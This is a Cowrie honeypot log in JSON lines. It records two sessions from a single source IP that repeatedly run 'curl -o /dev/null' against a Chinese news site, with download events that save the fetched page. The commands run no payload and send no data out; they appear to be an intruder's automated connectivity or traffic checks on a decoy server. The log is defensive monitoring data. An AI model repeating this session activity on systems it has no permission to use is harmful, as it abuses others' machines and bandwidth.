{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.788098Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.789966Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.790605Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.801249Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.816916Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.818083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.818739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.830098Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.831125Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.854271Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.855342Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.863201Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.864987Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.869803Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.871054Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.871944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.881349Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.886068Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.891282Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.892152Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.900715Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.902272Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.905606Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.907517Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.910466Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.915089Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.916576Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.917527Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.926755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.927604Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.932136Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.934622Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.940304Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.941575Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.946642Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.952391Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.957536Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.958413Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:32.965315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.966086Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.985926Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:32.998994Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.000793Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.001949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.005623Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.007345Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.010288Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.019145Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.047330Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.048361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.052634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.053636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.079827Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.088361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.089297Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.091625Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.092642Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.116699Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.128409Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.129412Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.131353Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.132226Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.154554Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.169059Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.170066Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.173086Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.174992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.216447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.227393Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.228294Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.232197Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.233202Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.260920Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.268951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.269902Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.273447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.276200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.277110Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.290869Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
